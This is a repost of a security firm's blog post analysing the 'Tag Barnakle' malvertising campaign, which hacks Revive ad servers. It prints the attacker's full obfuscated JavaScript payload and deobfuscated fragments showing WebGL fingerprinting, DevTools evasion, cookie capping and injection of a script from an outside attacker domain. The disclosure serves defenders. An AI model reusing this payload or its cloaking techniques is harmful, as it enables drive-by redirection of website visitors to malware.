Confiant - Medium

Tag Barnakle: The Malvertiser That Hacks Revive Ad Servers, Redirects Victims To Malware

Read the original article: Tag Barnakle: The Malvertiser That Hacks Revive Ad Servers, Redirects Victims To Malware

Stock photo via unsplash.com

When we discuss sophisticated malvertisers, we usually talk of savvy cybercriminal media buyers who spawn fake agencies and run brilliantly cloaked ad code in order to launch forceful redirections or deliver other client-side exploits and phishing attacks — but there’s another breed of attacker out there that doesn’t have to spend a single cent on running ad campaigns.

In this blog post, we will disclose the details behind one such ongoing malvertising campaign that is perpetrated by an attacker via mass compromise of Revive Ad Server instances. They then append their malicious payload to existing ad slots, all of which results in free access to publisher inventory. We have named the attacker Tag Barnakle.

This blog post will be the first in a series of disclosures around hacked ad servers.

Revive Ad Server — A History Of Security Issues

Publishers, advertisers, and ad networks have several options when it comes to campaign and/or inventory management. These options include a wide spectrum of managed enterprise solutions, white label ad servers, in-house tech, and open source platforms.

A popular go to for the self-hosted DIY ad serving crowd is an open source ad server called Revive — a huge PHP project that has been around for well over a decade:

revive-adserver/revive-adserver

It’s a project that has not been without its fair share of security issues over the years:

Security Advisories

https://github.com/revive-adserver/revive-adserver/issues?q=is%3Aissue+security
https://hackerone.com/revive_adserver/hacktivity

This not to say that the Revive team doesn’t handle security issues well, but more to illustrate that this is a large project that has been around for many years and that there are many ad serving infrastructures out there that are based on dated versions of Revive.

Enter Tag Barnakle

The typical Revive Ad Server tag is pretty bare bones compared to those of many popular enterprise ad servers like DFP, including the creatives themselves.

Here’s an example of a typical revive creative:

<a href='https://redacted/www/delivery/ck.php?oaparams=2__bannerid=261__zoneid=34__cb=8b804e704b__oadest=https%3A%2F%2Fredacted%2F' target='_blank'><img src='https://redacted/www/isn/images/ada6671b143fad855a110b1ce10ca603.gif' width='468' height='60' alt='' title='' border='0' /></a><div id='beacon_8b804e704b' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://redacted/www/delivery/lg.php?bannerid=261&amp;campaignid=183&amp;zoneid=34&amp;loc=https%3A%2F%2Fredacted%2F&amp;cb=8b804e704b' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

In recent months, we have seen a wave of malvertisements that are attached to Revive creatives spanning dozens of instances of ad servers, including those owned and operated by publishers and ad networks.

The attacker, Tag Barnakle, are compromising ad servers and appending their malvertising payload to live creatives. The entry point is always the same obfuscated Javascript payload, but of course there are variations in the obfuscated variable names and in the intermediate fingerprinting domain utilized.

Here’s an example of a full payload:

<script type="text/javascript">var _0x3d47=["1Pd1R2md79KqeBE=","UP71jPdtsdQrqg==","UuPxqupqqNQ9qpJHAeTOZv40","G2IKjDhIc2TK5wJluXHeBw==","charCodeAt","1Dt0UVGDyRD4yxE=","xvJnUXOLxdSk","1uhqSW6c","weJ9ViiTzcyiZxaNfcsU","ZDdmYg==","VOnkruxmgN02s5ZFWA==","wehWVnWQwt0=","hLwlR3+JxcimZ0i5ZtJM/l7roEaZJyQZSp0CdnIFsZK09FN4nNxaYa+5fGfIKF8=","2Q9E2b263W855af","ymmiE5aM2xniPwLGWw==","YtXMjstIgPUMiLZlaNz5W84dpZXm","DpxMHgAhDQ7P+h0=","3fNxUnTDg5U=","YtXMjstIgPUMjLZlaNb5QcsHsJfofqs=","mLI1EjeJ1A==","indexOf","fromCharCode","YN7DiNRcodQxq5R0XvbFYPwqgqD1UImgOA==","atob","08FNZ3GS/vOnXD6ncfgMug32","hrc1Un8=","length","xuJxY3ON3tOhYQGa","1vVgQ3Oc6dameRCRYA==","1CZTWkq/xRjzyh/kUw==","+zxoUUG+yw==","yATSQWdd","0vVgR2mfwNuwfA==","UP71n/lxpNw2qpZZ","xuR3S3eN","x+ZrRmiU","3OM=","x3myMZ+b3x/pKSzQZhU=","cKtB9DQrW","cookie","3j1oW06u","3/JhRWKLxdmmdhmQYA==","2eJjVg=="];(function(_0x1d7d79,_0x3d4748){var _0x327655=function(_0x1b9394){while(--_0x1b9394){_0x1d7d79["push"](_0x1d7d79["shift"]());}};_0x327655(++_0x3d4748);}(_0x3d47,0xdf));var _0x3276=function(_0x1d7d79,_0x3d4748){_0x1d7d79=_0x1d7d79-0x0;var _0x327655=_0x3d47[_0x1d7d79];return _0x327655;};function hIkeUmON9h4fvz(_0x4ba71b,_0x20c2e7){var _0x1a3c32=[],_0x106560=0x0,_0x1cfd2c,_0x4fdc9b="";for(var _0x21ce01=0x0;_0x21ce01<0x100;_0x21ce01++){_0x1a3c32[_0x21ce01]=_0x21ce01;}for(_0x21ce01=0x0;_0x21ce01<0x100;_0x21ce01++){_0x106560=(_0x106560+_0x1a3c32[_0x21ce01]+_0x20c2e7[_0x3276("0x27")](_0x21ce01%_0x20c2e7[_0x3276("0x12")]))%0x100;_0x1cfd2c=_0x1a3c32[_0x21ce01];_0x1a3c32[_0x21ce01]=_0x1a3c32[_0x106560];_0x1a3c32[_0x106560]=_0x1cfd2c;}_0x21ce01=0x0;_0x106560=0x0;for(var _0x2c777a=0x0;_0x2c777a<_0x4ba71b[_0x3276("0x12")];_0x2c777a++){_0x21ce01=(_0x21ce01+0x1)%0x100;_0x106560=(_0x106560+_0x1a3c32[_0x21ce01])%0x100;_0x1cfd2c=_0x1a3c32[_0x21ce01];_0x1a3c32[_0x21ce01]=_0x1a3c32[_0x106560];_0x1a3c32[_0x106560]=_0x1cfd2c;_0x4fdc9b+=String[_0x3276("0xd")](_0x4ba71b[_0x3276("0x27")](_0x2c777a)^_0x1a3c32[(_0x1a3c32[_0x21ce01]+_0x1a3c32[_0x106560])%0x100]);}return _0x4fdc9b;}function iUge9xLrSMK(_0x48aea7){var _0x558354="";try{_0x558354=window[_0x3276("0xf")](_0x48aea7);}catch(_0x3aa2b0){}return _0x558354;};function aaCSJW2TqSgCGuFI(){var _0x598e0b=[_0x3276("0x1"),_0x3276("0x2"),"VPrvuflw","QP7jqPQ=",_0x3276("0x25"),_0x3276("0x24"),"UP71iuB3oN8gt5xF",_0x3276("0x19"),_0x3276("0xe"),_0x3276("0x7"),_0x3276("0xa")];var _0x556835=document[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x1]),_0x598e0b[0x0])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x2]),_0x598e0b[0x0]));var _0x4e90ee;var _0x148a3a;var _0x3d684e;var _0x5cffb6;try{_0x4e90ee=_0x556835[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x5]),_0x598e0b[0x0])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x3]),_0x598e0b[0x0]))||_0x556835[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x5]),_0x598e0b[0x0])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x4]),_0x598e0b[0x0]));}catch(_0x2803f9){}if(_0x4e90ee){_0x148a3a=_0x4e90ee[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x6]),_0x598e0b[0x0])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x8]),_0x598e0b[0x0]));_0x3d684e=_0x4e90ee[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x7]),_0x598e0b[0x0])](_0x148a3a[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x9]),_0x598e0b[0x0])]);_0x5cffb6=_0x4e90ee[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0x7]),_0x598e0b[0x0])](_0x148a3a[hIkeUmON9h4fvz(iUge9xLrSMK(_0x598e0b[0xa]),_0x598e0b[0x0])]);}return _0x3d684e+"x20"+_0x5cffb6;}function ffM7CuBy8(){var _0x5e349c=["DpxMHgA+AQPc+g==","CIdWHgA+AQPc+g==",_0x3276("0x8"),"rvb3K00KOkQZg",_0x3276("0x28"),_0x3276("0x16"),_0x3276("0x20"),_0x3276("0x15"),"dsVsia7Keq6EMdb"];const _0x5647a3=0xa0;const _0x2c66df=window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x0]),_0x5e349c[0x3])]-window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x1]),_0x5e349c[0x3])]>_0x5647a3;const _0x5ed796=window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x2]),_0x5e349c[0x3])]-window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x4]),_0x5e349c[0x8])]>_0x5647a3;if(!(_0x5ed796&&_0x2c66df)&&(window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x5]),_0x5e349c[0x8])]&&window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x5]),_0x5e349c[0x8])][hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x6]),_0x5e349c[0x8])]&&window[hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x5]),_0x5e349c[0x8])][hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x6]),_0x5e349c[0x8])][hIkeUmON9h4fvz(iUge9xLrSMK(_0x5e349c[0x7]),_0x5e349c[0x8])]||_0x2c66df||_0x5ed796)){return![];}else{return!![];}}function fQH1NVOW(){var _0x4471fd=[_0x3276("0x5"),"xfJnTm6aydSxcRHRd9QN8QOig0LOb2JEFA==",_0x3276("0x4"),_0x3276("0x14"),_0x3276("0x1a"),_0x3276("0x13"),"xvVm",_0x3276("0x1c"),_0x3276("0x21"),"wf51Rw==",_0x3276("0x0"),"1OV2TWuM2N8=",_0x3276("0x11"),_0x3276("0xb"),_0x3276("0x23"),_0x3276("0x2a"),_0x3276("0x22"),_0x3276("0x1b"),_0x3276("0x3"),_0x3276("0x29"),_0x3276("0x10"),_0x3276("0x1e"),_0x3276("0x18"),_0x3276("0x9")];var _0x95c68e;try{_0x95c68e=aaCSJW2TqSgCGuFI();}catch(_0x1c3d83){}try{_0x95c68e=window["btoa"](_0x95c68e);}catch(_0x1779da){}var _0x4ee8f0=!![];var _0xd4dce2=hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x14]),_0x4471fd[0x15]);if(document[_0x3276("0x1f")][_0x3276("0xc")](_0xd4dce2)==-0x1){if(ffM7CuBy8()){var _0x5acb3b=hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x2]),_0x4471fd[0x15]);var _0x30b032=hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x17]),_0x4471fd[0x15])+hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x1]),_0x4471fd[0x15])+"?"+hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x8]),_0x4471fd[0x15])+"="+_0x95c68e;var _0x16c7a1=document[hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x3]),_0x4471fd[0x15])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x4]),_0x4471fd[0x15]));_0x16c7a1[hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x5]),_0x4471fd[0x15])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x7]),_0x4471fd[0x15]),hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x8]),_0x4471fd[0x15]));_0x16c7a1[hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x5]),_0x4471fd[0x15])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x9]),_0x4471fd[0x15]),hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0xa]),_0x4471fd[0x15]));_0x16c7a1[hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x5]),_0x4471fd[0x15])](hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0x6]),_0x4471fd[0x15]),_0x30b032);document["body"][hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0xe]),_0x4471fd[0x15])](_0x16c7a1);document[hIkeUmON9h4fvz(iUge9xLrSMK(_0x4471fd[0xf]),_0x4471fd[0x15])]=_0xd4dce2+_0x5acb3b;}}}var iboc7VhgLDhRKG=[_0x3276("0x1d"),_0x3276("0x6"),"bbXD3odpJHC4rhZv",_0x3276("0x26"),"PkkjiiFDaXXo+j1+vXveEQ==",_0x3276("0x17")];var elementExists=document[hIkeUmON9h4fvz(iUge9xLrSMK(iboc7VhgLDhRKG[0x0]),iboc7VhgLDhRKG[0x2])](hIkeUmON9h4fvz(iUge9xLrSMK(iboc7VhgLDhRKG[0x1]),iboc7VhgLDhRKG[0x2]));if(!elementExists){document[hIkeUmON9h4fvz(iUge9xLrSMK(iboc7VhgLDhRKG[0x3]),iboc7VhgLDhRKG[0x5])](hIkeUmON9h4fvz(iUge9xLrSMK(iboc7VhgLDhRKG[0x4]),iboc7VhgLDhRKG[0x5]),fQH1NVOW());}</script><a href='https://redacted/www/delivery/ck.php?oaparams=2__bannerid=261__zoneid=34__cb=8b804e704b__oadest=https%3A%2F%2Fredacted%2F' target='_blank'><img src='https://redacted/www/isn/images/ada6671b143fad855a110b1ce10ca603.gif' width='468' height='60' alt='' title='' border='0' /></a><div id='beacon_8b804e704b' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://redacted/www/delivery/lg.php?bannerid=261&amp;campaignid=183&amp;zoneid=34&amp;loc=https%3A%2F%2Fredacted%2F&amp;cb=8b804e704b' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

We have reverse engineered the obfuscation. The logic, along with code samples is as follows:

  • Check if there’s an element in the DOM with an ID of “judgericeblot”. If not, then step into a (randomly named) function after the DOM loads.
var elementExists = document["getElementById"]("judgericeblot");
if (!elementExists) {
    document["addEventListener"]("DOMContentLoaded", o5G0Vnpuq1());
}
  • Check if the the user has been previous cookied by the script. If not, then continue:
if (document["cookie"]["indexOf"](_0x53c6f1) == -0x1)
  • Check if the user has DevTools or Firebug open. If not, then continue.This method of checking for the developer console is actually quite weak and is easily defeated if the console is detached from the window.
const _0x5e8e5a = 
window["outerWidth"] - window["innerWidth"] > _0x2a09f6;
const _0x558f8f = 
window["outerHeight"] - window["innerHeight"] > _0x2a09f6;
if (!(_0x558f8f && _0x5e8e5a) && (window["Firebug"] && window["Firebug"]["chrome"] && window["Firebug"]["chrome"]["isInitialized"] || _0x5e8e5a || _0x558f8f)) { 
  false; 
} else { 
  true;
}
  • All of the checks have passed, so Tag Barnakle proceeds towards injecting a 3rd party dependency via an intermediate domain. Additional client-side fingerprints are passed to this domain in the from of a base64 encoded parameter. Here’s a function that re-creates their cursory fingerprinting algorithm:
(function(){
 let c = document.createElement("canvas");
 let var1;
 let var2;
 let var3;
 try {
  x = c.getContext('webgl') || c.getContext('experimental-webgl');
 } catch(e){}
 if (x) {
  var1 = x.getExtension("WEBGL_debug_renderer_info");
  var2 = x.getParameter(var1["UNMASKED_VENDOR_WEBGL"]);
  var3 = x.getParameter(var1["UNMASKED_RENDERER_WEBGL"]);
 }
 let final = var2 + "x20" + var3;
 return final;
})();
  • From there, the payload constructs the final url:
hxxps://publicenred.com/line.html?judgericeblot=SW50ZWwgSW5jLngyMEludGVsKFIpIElyaXMoVE0pIFBsdXMgR3JhcGhpY3MgNjU1
  • This is then dropped into the DOM inside of a script tag using appendChild:
var _0x1dfa8e = document["createElement"]("script");
_0x1dfa8e["setAttribute"]("id", "judgericeblot");
_0x1dfa8e["setAttribute"]("type", "text/javascript");
<!-------
set script src to: hxxps://publicenred.com/line.html?judgericeblot=SW50ZWwgSW5jLngyMEludGVsKFIpIElyaXMoVE0pIFBsdXMgR3JhcGhpY3MgNjU1
-------->
_0x1dfa8e["setAttribute"](oiYVsFl(t8edm7ubzOO(_0x19f474[0x6]), _0x19f474[0x15]), _0x2cfc43);
document["body"]["appendChild"](_0x1dfa8e);
  • Finally, the frequency capping cookie is dropped, because the attacker doesn’t want to reveal the payload to the same victim more than once in a short period of time:
// dw5id94BSpNR


 [...]





Read the original article: Tag Barnakle: The Malvertiser That Hacks Revive Ad Servers, Redirects Victims To Malware